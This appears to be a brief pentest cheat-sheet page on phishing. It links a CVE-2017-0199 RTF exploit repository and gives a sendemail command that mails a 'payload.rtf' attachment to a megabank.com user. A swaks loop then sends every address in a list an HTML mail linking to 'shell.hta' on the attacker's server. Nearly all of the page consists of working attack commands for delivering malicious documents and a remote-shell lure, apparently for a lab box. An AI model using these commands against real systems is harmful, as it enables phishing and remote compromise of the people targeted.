Sendemail

RTF (Rich Text Format)

https://github.com/bhdresh/CVE-2017-0199

sendemail -f test@megabank.com -t nico@megabank.com -u RTF -m "Please Convert This File" -a payload.rtf -s 10.10.10.77

`cat emails.txt`; do swaks --body 'Dont click this link http://10.10.x.y/shell.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Please click" -t $i -f <email sender> --server 10.10.x.y; done

Last updated